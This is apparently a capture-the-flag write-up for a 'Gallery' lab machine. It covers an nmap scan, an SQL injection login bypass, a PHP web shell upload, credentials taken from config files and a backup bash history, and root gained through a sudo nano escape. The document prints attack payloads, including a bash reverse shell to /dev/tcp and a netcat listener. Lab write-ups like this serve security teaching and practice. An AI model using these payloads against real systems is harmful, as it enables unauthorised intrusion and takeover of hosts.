Gallery

Web Recon - File Upload - Mike's backup folder - Nano PrivEsc

Recon

  • First run up Rust-nmap and got two ports open , that is port 80 and port 8080 

# Nmap 7.92 scan initiated Sat Feb 12 22:32:01 2022 as: nmap -A -oN nmap-scan 10.10.112.90
Nmap scan report for 10.10.112.90
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Simple Image Gallery System
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 12 22:33:06 2022 -- 1 IP address (1 host up) scanned in 65.51 seconds

  • Decided to open port 80 on my browser and it gave out apache server homepage

  • Now I open up , the other port 8080 , which is a proxy , and it redirects me to https://ip/gallery/ which has a login page

Initial Access & Foothold

  • So on the login page, I try SQLi with the payload : admin ' or 1=1 limit 1-- +' and I was able to login as administrator

  • Looking around the dashbord I found an upload field on the profile settings, so I uploaded the file captured the request , and then edited the file contents , to a simple web shell

[tahaafarooq@urchinsec-lab gallery]$ curl "http://10.10.118.206/gallery/uploads/1644852240_shell.php?0=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)

  • And now time to pop shell

  • Now that I have shell, I decided to look for configuration files, and I found config.php but it was importing files from another folder

<?php
ob_start();
ini_set('date.timezone','Asia/Manila');
date_default_timezone_set('Asia/Manila');
session_start();

require_once('initialize.php');
require_once('classes/DBConnection.php');
require_once('classes/SystemSettings.php');
$db = new DBConnection;
$conn = $db->conn;

  • I was able to find DBConnection.php from classes folder and it had the following

<?php
if(!defined('DB_SERVER')){
    require_once("../initialize.php");
}
class DBConnection{

    private $host = DB_SERVER;
    private $username = DB_USERNAME;
    private $password = DB_PASSWORD;
    private $database = DB_NAME;
    
    public $conn;
    
    public function __construct(){

        if (!isset($this->conn)) {
            
            $this->conn = new mysqli($this->host, $this->username, $this->password, $this->database);
            
            if (!$this->conn) {
                echo 'Cannot connect to database server';
                exit;
            }            
        }    
        
    }
    public function __destruct(){
        $this->conn->close();
    }
}
?>

  • which means the values of those variables are at initialize.php

<?php
$dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');

if(!defined('base_url')) define('base_url',"http://" . $_SERVER['SERVER_ADDR'] . "/gallery/");
if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
if(!defined('dev_data')) define('dev_data',$dev_data);
if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
if(!defined('DB_USERNAME')) define('DB_USERNAME',"gallery_user");
if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"passw0rd321");
if(!defined('DB_NAME')) define('DB_NAME',"gallery_db");
?>

  • I was able to get mysql creds , and $dev_data information which seem to be creds for the developer , and there was the username and password as hash, I was able to answer number three by login to mysql and then copying the hash for admin!

  • First thing I did, was to update the shell, so as it doesn’t give those shell errors 

www-data@gallery:/var/backups/mike_home_backup$ /usr/bin/script -qc /bin/bash /dev/null
<ome_backup$ /usr/bin/script -qc /bin/bash /dev/null
www-data@gallery:/var/backups/mike_home_backup$ ^Z
[1]+  Stopped                 nc -lnvp 1337
[tahaafarooq@urchinsec-lab urchinshell]$ stty raw -echo; fg
nc -lnvp 1337
export TERM=xterm

  • I was able to update the shell, and as I was checking through /var/backups I was able to see a user’s backup folder mike, so I read the history, and I was able to get the password

www-data@gallery:/var/backups/mike_home_backup$ cat .bash_history
cat .bash_history
cd ~
ls
ping 1.1.1.1
cat /home/mike/user.txt
cd /var/www/
ls
cd html
ls -al
cat index.html
sudo -lb[REDACTED]x
clear
sudo -l
exit

User.txt

www-data@gallery:/var/backups/mike_home_backup$ su mike
Password: 
mike@gallery:/var/backups/mike_home_backup$ cd ~
mike@gallery:~$ ls
documents  images  user.txt
mike@gallery:~$ cat user.txt
THM{af05[REDACTED]46ef}

Privilege Escalation

  • I first run sudo -l and I got to see what commands can mike run as root

mike@gallery:~$ sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh

  • I read the file /opt/rootkit.sh

#!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck)
        /usr/bin/rkhunter --versioncheck ;;
    update)
        /usr/bin/rkhunter --update;;
    list)
        /usr/bin/rkhunter --list;;
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac

  • After looking at the contents of rootkit.sh, we have four choices which is versioncheck, update, list and read. Now from the available choices, the last one seems to be interesting as we can run nano as root. Time for a quick look at gtfobins

^R^X [control+R + control+X]
reset; sh 1>&0 2>&0

  • and from here now I can type

/bin/bash -c "bash -i &>/dev/tcp/tunip/port <&1"

  • Set a listener on your terminal and boom we have root shell

[tahaafarooq@urchinsec-lab gallery]$ nc -lvnp 1122
Connection from 10.10.170.61:54522
root@gallery:~# id
id
uid=0(root) gid=0(root) groups=0(root)
PreviousRabbitNextOverpass

Last updated